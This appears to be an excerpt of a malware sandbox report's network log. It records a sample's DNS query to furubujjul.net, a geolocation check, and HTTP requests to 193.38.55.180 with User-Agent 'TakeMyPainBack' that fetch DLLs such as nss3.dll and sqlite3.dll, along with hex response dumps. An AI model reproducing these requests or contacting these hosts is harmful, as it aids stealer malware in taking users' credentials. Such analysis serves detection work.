Source: unknown DNS traffic detected: queries for: furubujjul.net
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 193.38.55.180Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 193.38.55.180Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 193.38.55.180Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 193.38.55.180Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 193.38.55.180Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 193.38.55.180Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 193.38.55.180Connection: Keep-AliveCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Oct 2022 15:34:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ysrkBd95yxrQYuIqJZk25AkZ1y9w9KEKztzSMIP5huhjpu937K%2FE75y0nhB%2FzPtdLbce1MjUwcjQaqZPlvs6zew9GOpS8Vc4eiMk2R%2FZugqWWKKeSG4kt63f5Jcm3sSwWA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7546be87de600676-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 33 30 0d 0a 18 00 00 00 1f 3d 5c a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 73 d2 09 b6 c9 de db c5 ba 1e d7 7f 00 12 17 00 23 c9 75 21 7d 31 a2 02 6b a5 2d 41 ec 51 18 fa f8 e1 fc b7 d5 59 5e d9 fc 05 8a e6 2e b0 b3 25 e5 ea a7 6b bf aa d2 2a a1 30 2e 91 f4 d1 8f ea 9f c6 25 9c c5 89 09 cb 73 4a b2 26 d8 20 90 41 44 69 cf 7e 2f 45 4f d8 13 77 10 87 39 b4 bf 0f f7 e9 19 82 a7 10 b1 d7 19 1a 19 6a 33 fc 4e ec 20 86 9f cf 03 46 7d f0 e6 e5 4f a4 db 03 b4 3f dc 6e 62 a8 cf d0 14 a1 8b 5a 40 bb 9c 22 79 f8 02 92 87 b6 85 0e 2a 26 b7 a0 50 44 13 d1 ad da 68 6b 16 86 cc 76 b9 cc c2 8b e1 c5 1a 29 ca ae 93 ea 2a 85 ed cb d3 f5 00 0b 8c 84 9b 73 73 ac 0e 89 cf 08 3b 19 e1 d1 18 0b 83 49 65 d5 bc a8 fb f8 75 ea 73 e5 36 e7 89 9e bc fc e0 93 9f 0e 30 e3 b1 93 95 97 a7 51 6e c6 76 98 34 61 81 b9 d4 29 1e 0b 48 34 51 ea a8 27 bd a7 d3 19 7b ba fb 14 37 89 40 35 c9 72 ce ff 7e 73 02 80 1d 34 a3 d6 d5 35 54 16 c0 8c 0b b9 9c 39 cc 5a 58 e4 72 4a e6 3d ac 59 3b f2 1d 17 db 53 f1 f9 f8 6d 3c cd 87 c5 4c 80 7e b9 38 2b 2b 80 c9 45 28 26 8c 39 c1 e6 f7 06 d2 9f 3e 54 78 a5 8f 04 e0 44 d8 60 ef b0 31 16 26 48 3c be 6d 48 19 5f 48 77 e4 60 01 bd 87 b0 1c 9d a1 16 f4 36 d8 35 bf ff c2 92 ea 11 27 67 98 42 42 9d 33 db ad c4 a3 26 8a 4b 66 21 d8 e8 f5 cb c5 74 47 a9 b2 e7 8c 03 31 86 6a da 0d d8 d6 c4 39 45 06 a7 92 40 bc b7 0c ee a1 e3 2d e7 7f ff 08 9e 1a e4 a2 39 f6 af eb 37 f9 22 7e d2 9a 52 2e a6 c0 ce 7d 15 3c f7 86 de a3 9b c7 d1 a6 f5 37 e4 1d 47 e4 a8 f1 e3 34 b5 9d 6b e1 c6 0f 1e c2 d1 4c 69 46 31 be 52 37 2a 13 f1 90 bb 5e 00 af bd cf d3 34 dc cd 26 20 32 30 1e 71 18 15 45 d5 f8 9e 0c 94 79 ea b4 f4 f6 da 66 24 c8 7b 72 72 58 6f 47 16 74 8a bd ad 34 13 13 7d 27 a1 79 5d b2 03 f1 af 97 4a cd 31 e2 5d d4 33 e6 16 91 9e fa ae ac e7 2e be bd 94 e8 0e d8 7b bc f4 e5 63 8c d4 89 47 d2 c8 81 4f 81 4f f3 55 43 56 9b 62 c8 4b 42 b3 0a f7 40 ec 9a 8a a3 0e c2 c8 6e 35 97 c7 a8 aa 86 3a 19 e2 ca 43 2a be 48 8a 79 b3 54 95 5f 47 Data Ascii: 3830=\7f0|gW5p@E74o8s#u!}1k-AQY^.%k*0.%sJ& ADi~/EOw9j3N F}O?nbZ@"y*&PDhkv)*ss;Ieus60Qnv4a)H4Q'{7@5r~s45T9ZXrJ
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Oct 2022 15:34:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DSah6JzI4yymTqf38ZJ4Zr23USwrWWkuzUKOzQ0RjW4D%2BqkE%2FIMiz5AdlJj034MB2zoKrQ%2FDnflwQVIaut5PLvw884IwiDdSBja%2Bv4ENusV4Kc5A2Uo6fF8HIcUcX%2BRbCA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7546be8a9a9c0676-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Oct 2022 15:34:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mhv6KU2MmHPkDdlA8pGI2L2eLI4x2oiuYfvYzJumgi8RYqnsdvgZUWODVknpvAXcZePdaQM%2BObK%2FQDESuW%2B6DvdeiQW9E%2F8T40R2MgTCLkjfLA8QR%2BD1wurauhQIbBJvjQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7546be8b5bd60676-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 64 35 37 0d 0a 02 00 b4 60 3b d4 0f 1a 40 10 16 30 8f b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 53 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 b3 98 30 06 81 8f f1 83 0e 25 a6 79 5e 5c 51 fb 32 35 47 48 3b fe cc bd 6c 62 ad 5d 6f 38 6d 57 12 73 36 18 28 a6 70 a3 d1 43 36 2f a4 14 0f 85 c2 e7 27 c2 25 7b ba 49 79 b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 15 13 90 31 a3 b8 24 08 4f c5 03 a1 cb a1 81 7e 50 54 62 b8 1b 0e 7e 0b ac 9a a5 9c d9 a0 c1 b9 dd 7a 65 f0 4d 19 e0 3c 95 a9 18 6a f6 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6f a1 c0 4a 9a 03 fd ec 9a aa 7b ac 87 2f bd 61 0d 40 49 bf 46 30 fd f8 12 6c 33 6c 2b 7c 0b 8d c7 fd e4 0e a4 eb 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 8b 29 b9 0e fe cc 23 b2 65 0a 31 79 fe 80 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af e1 3f 27 1c 5e b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 71 67 a3 1e 1e 54 ab 1e e2 2e 12 ee c3 de 57 a3 4c 49 86 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 54 f8 8d f1 99 07 99 8a 29 c4 7f 74 79 20 6e 43 cc 9b 8b 8b e1 3a 79 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 92 f2 f9 7a 8f f6 6b e3 40 dd d9 37 00 20 e0 1c c9 20 f5 52 48 be 39 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 58 58 07 6b ab f6 ae 25 2e e3 86 ce ec 35 28 c0 a7 0d ba ca d4 5f 53 40 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 Data Ascii: 7d57`;@0,xO}q4 SJ%9Wd8IkDJ8P>0%y^\Q25GH;lb]o8mWs6(pC6/'%{IyShG*j*T05sq733hsE|WD<P5Q"f=(*jC\SMUdT[Up"XJ3Ob>!Z:V?#BSSR+{~E(U1$O~PTb~zeM<j%a>|*HoJ{/a@IF0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Oct 2022 15:34:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5s0zTVwEZQ%2BxrnJWHZ9tdU0oOSOsDblxQqncU6kasaqVpYFijT4CRf5tcLW95NIAQzdUve%2FiSK163Yqq1RFf7YA2xI2lIRYy7VzkURKlOuImsgPYj8ImT2%2FowmMoEZAOUw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7546be908beb0676-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Oct 2022 15:34:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cRcAWZSBQtyCBSDGvPM7a2SJMsQXc3r3OPHzfakaYg%2BmcagnwmnybR1RyTY8BrpITO9DLotd8rMxqMpOcYrbwHECv3cov5QZtsWIVCxQzxKwdMNstj7heaSB1qluzcGQdg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7546be915d100676-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Oct 2022 15:34:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Iroc%2FNBgZmP4ZQ9lMPeleBKiJHkOKRk8KBsjnpr0c2RRqTjrd%2B9fFtktpg9g2RP9e898uVJAFNh%2FcxRzugBls2GWTB5LRr4yNMD7dp%2FS%2BSayie9eJ6Gx824qWjBCWqAbBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7546be91fe180676-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 64 36 35 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 c5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 59 87 a0 59 40 18 b6 30 ec 48 4d fc 30 db 91 3f ab 49 32 1e ca e5 7c 36 38 fd ae bd 5b 2b 97 ff 30 b2 ac 89 bd 03 f3 88 4b f4 1b f0 14 29 f5 32 d0 6c 99 b3 f8 7a 99 e4 f2 c9 5a 11 11 a2 7f 8f c9 12 66 6a 0a ea e9 99 36 f8 37 33 3b 49 bd 1c ed 05 70 b1 17 22 58 4a 63 0a 62 3e 59 20 08 5a 9a 96 83 5b 56 3f cb 00 23 be 42 15 37 07 50 52 f1 ca 16 9e 1d d5 52 2b e5 df 9c 7b 7e 45 f7 ff 8f c6 55 db c4 1d 13 13 bf ee e1 92 24 08 0f c5 03 b1 cb a1 61 7c de f5 6c b9 19 17 7e 5f af 9a a0 44 c9 a0 c1 b9 dd 7a 0d b0 6e 19 e0 28 95 a9 1e 1c fe 96 bc 25 51 e0 9a d4 2e 7c 88 38 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 7b ac 97 2f bd 61 0d c0 5d bf 46 34 fd f8 ee 8c 33 6c 79 7c 0a 8d c7 2d fb 0e 14 a0 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 47 29 2a b9 6e ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 9f 1d 3c 27 94 69 b7 9f 33 c9 cc 46 d9 48 15 ac af fb d9 55 e5 ae ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b aa 93 58 1e 85 8a 64 b1 eb eb 12 51 8c 60 17 4b 81 b7 df 8e 82 05 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 4f c3 cb 49 1c 4c 86 2f 7f 54 ab 1e 9a a6 0f ee c3 3e 57 a3 4c 29 8c 1f d4 bc 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 e6 7d 10 5f 3e cb aa c2 fa 07 99 8a 7d af 7f 74 79 80 72 43 cc f5 8b 8b e1 76 70 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 5f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 Data Ascii: 7d65`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*YY@0HM0?I2|68[+0K)2lzZfj673;Ip"XJcb>Y Z[V?#B7PRR+{~EU$a|l~_Dzn(%Q.|8HkJ{/a]F4
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Oct 2022 15:34:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FJ00tD5gPz05saCE%2B0HayHbciB2NTl%2FCPoVVYse%2BrNKSUf6t3CnHNRpQ4dqD2P2odEwGit34gFmOgp%2BwfSkBNACWfGClCvC%2FzGXTUE6oRcGdliRGUM2CPc%2BxeV5wC7lo8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7546be97ce6e0676-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Oct 2022 15:34:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mzcsj7KJAjRo%2F8CALzaBVYVjt1zUMfNARzHszABeOyvXAKkXU0hERxva3%2F23kvckuSSmpj3ZSrMlt8oBId3Tb%2FI3UzZNILe0p2Ejz%2FKUDFn29kXrUqUPRIrc0iDzeeOHpA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7546be98afa60676-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Oct 2022 15:34:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gQjUQNnYQ6fj9%2BQnPK1JiwhKlScOlDNe4bba7d8QBURv8ezrenmukJE16z9hk4J9CeMKnoX4Q%2FMhooferiAHjcYrpmoXvPvxumStpDE4%2B2GAMMZe0TCwX%2FCGcN783EZ7iQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7546be9998fc0676-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 61 32 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 